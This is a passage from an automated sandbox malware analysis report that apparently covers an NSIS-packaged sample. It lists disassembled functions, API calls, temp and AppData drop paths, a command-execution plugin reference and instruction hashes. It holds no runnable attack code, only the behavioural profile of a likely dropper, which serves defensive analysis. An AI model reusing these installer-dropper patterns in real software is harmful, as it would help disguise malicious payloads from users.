                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                                                                                                                      Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 573 4032b9-4032d0 574 4032d2 573->574 575 4032d9-4032e2 573->575 574->575 576 4032e4 575->576 577 4032eb-4032f0 575->577 576->577 578 403300-40330d call 4034d4 577->578 579 4032f2-4032fb call 4034ea 577->579 583 4034c2 578->583 584 403313-403317 578->584 579->578 585 4034c4-4034c5 583->585 586 40346d-40346f 584->586 587 40331d-403366 GetTickCount 584->587 590 4034cd-4034d1 585->590 588 403471-403474 586->588 589 4034af-4034b2 586->589 591 4034ca 587->591 592 40336c-403374 587->592 588->591 595 403476 588->595 593 4034b4 589->593 594 4034b7-4034c0 call 4034d4 589->594 591->590 596 403376 592->596 597 403379-403387 call 4034d4 592->597 593->594 594->583 607 4034c7 594->607 600 403479-40347f 595->600 596->597 597->583 606 40338d-403396 597->606 603 403481 600->603 604 403483-403491 call 4034d4 600->604 603->604 604->583 610 403493-40349f call 4060f9 604->610 609 40339c-4033bc call 406aa6 606->609 607->591 615 4033c2-4033d5 GetTickCount 609->615 616 403465-403467 609->616 617 4034a1-4034ab 610->617 618 403469-40346b 610->618 619 403420-403422 615->619 620 4033d7-4033df 615->620 616->585 617->600 621 4034ad 617->621 618->585 624 403424-403428 619->624 625 403459-40345d 619->625 622 4033e1-4033e5 620->622 623 4033e7-403418 MulDiv wsprintfW call 4055dc 620->623 621->591 622->619 622->623 632 40341d 623->632 628 40342a-403431 call 4060f9 624->628 629 40343f-40344a 624->629 625->592 626 403463 625->626 626->591 633 403436-403438 628->633 631 40344d-403451 629->631 631->609 634 403457 631->634 632->619 633->618 635 40343a-40343d 633->635 634->591 635->631
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                                                                                      • String ID: *B$ FB$ A$ A$... %d%%
                                                                                                                                                                                      • API String ID: 551687249-3833040932
                                                                                                                                                                                      • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                                                                      • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                                                                                                                      • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                                                                                                                                                      Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 636 401774-401799 call 402dab call 405e9d 641 4017a3-4017b5 call 406557 call 405e26 lstrcatW 636->641 642 40179b-4017a1 call 406557 636->642 647 4017ba-4017bb call 406805 641->647 642->647 651 4017c0-4017c4 647->651 652 4017c6-4017d0 call 4068b4 651->652 653 4017f7-4017fa 651->653 661 4017e2-4017f4 652->661 662 4017d2-4017e0 CompareFileTime 652->662 655 401802-40181e call 406047 653->655 656 4017fc-4017fd call 406022 653->656 663 401820-401823 655->663 664 401892-4018bb call 4055dc call 4032b9 655->664 656->655 661->653 662->661 665 401874-40187e call 4055dc 663->665 666 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 663->666 678 4018c3-4018cf SetFileTime 664->678 679 4018bd-4018c1 664->679 676 401887-40188d 665->676 666->651 698 401869-40186a 666->698 680 402c38 676->680 682 4018d5-4018e0 CloseHandle 678->682 679->678 679->682 686 402c3a-402c3e 680->686 683 4018e6-4018e9 682->683 684 402c2f-402c32 682->684 687 4018eb-4018fc call 406594 lstrcatW 683->687 688 4018fe-401901 call 406594 683->688 684->680 694 401906-4023a7 call 405bb7 687->694 688->694 694->684 694->686 698->676 700 40186c-40186d 698->700 700->665
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers,?,?,00000031), ref: 004017B5
                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers,?,?,00000031), ref: 004017DA
                                                                                                                                                                                        • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                        • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp$C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers$ExecToStack
                                                                                                                                                                                      • API String ID: 1941528284-3951532508
                                                                                                                                                                                      • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                                                                      • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                                                                                                                                                      Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 702 4055dc-4055f1 703 4055f7-405608 702->703 704 4056a8-4056ac 702->704 705 405613-40561f lstrlenW 703->705 706 40560a-40560e call 406594 703->706 708 405621-405631 lstrlenW 705->708 709 40563c-405640 705->709 706->705 708->704 710 405633-405637 lstrcatW 708->710 711 405642-405649 SetWindowTextW 709->711 712 40564f-405653 709->712 710->709 711->712 713 405655-405697 SendMessageW * 3 712->713 714 405699-40569b 712->714 713->714 714->704 715 40569d-4056a0 714->715 715->704
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                      • lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                      • lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                      • SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                      • String ID: antholite
                                                                                                                                                                                      • API String ID: 2531174081-3488562018
                                                                                                                                                                                      • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                      • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                                                                                                                                                      Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 716 4068db-4068fb GetSystemDirectoryW 717 4068fd 716->717 718 4068ff-406901 716->718 717->718 719 406912-406914 718->719 720 406903-40690c 718->720 722 406915-406948 wsprintfW LoadLibraryExW 719->722 720->719 721 40690e-406910 720->721 721->722
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                      • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                                      • API String ID: 2200240437-1106614640
                                                                                                                                                                                      • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                      • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                                                                                                                                                      Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 723 406076-406082 724 406083-4060b7 GetTickCount GetTempFileNameW 723->724 725 4060c6-4060c8 724->725 726 4060b9-4060bb 724->726 727 4060c0-4060c3 725->727 726->724 728 4060bd 726->728 728->727
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406094
                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                      • API String ID: 1716503409-1857211195
                                                                                                                                                                                      • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                      • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                                                                                                                                                      Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 729 4015c6-4015da call 402dab call 405ed1 734 401636-401639 729->734 735 4015dc-4015ef call 405e53 729->735 737 401668-4022fb call 401423 734->737 738 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 734->738 742 4015f1-4015f4 735->742 743 401609-40160c call 405b05 735->743 753 402c2f-402c3e 737->753 738->753 755 401660-401663 738->755 742->743 746 4015f6-4015fd call 405b22 742->746 752 401611-401613 743->752 746->743 759 4015ff-401602 call 405aab 746->759 756 401615-40161a 752->756 757 40162c-401634 752->757 755->753 760 401629 756->760 761 40161c-401627 GetFileAttributesW 756->761 757->734 757->735 764 401607 759->764 760->757 761->757 761->760 764->752
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405EDF
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                                                                                        • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers,?,00000000,000000F0), ref: 00401652
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers, xrefs: 00401645
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers
                                                                                                                                                                                      • API String ID: 1892508949-4212467774
                                                                                                                                                                                      • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                                                                                                                      • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                                                                                                                      • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                                                                                                                                                                      Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 769 4020dd-4020e9 770 4021a8-4021aa 769->770 771 4020ef-402105 call 402dab * 2 769->771 772 4022f6-4022fb call 401423 770->772 780 402115-402124 LoadLibraryExW 771->780 781 402107-402113 GetModuleHandleW 771->781 779 402c2f-402c3e 772->779 783 402126-402135 call 4069ba 780->783 784 4021a1-4021a3 780->784 781->780 781->783 788 402170-402175 call 4055dc 783->788 789 402137-40213d 783->789 784->772 793 40217a-40217d 788->793 791 402156-40216e 789->791 792 40213f-40214b call 401423 789->792 791->793 792->793 802 40214d-402154 792->802 793->779 795 402183-40218d call 403bc9 793->795 795->779 801 402193-40219c FreeLibrary 795->801 801->779 802->793
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                        • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 334405425-0
                                                                                                                                                                                      • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
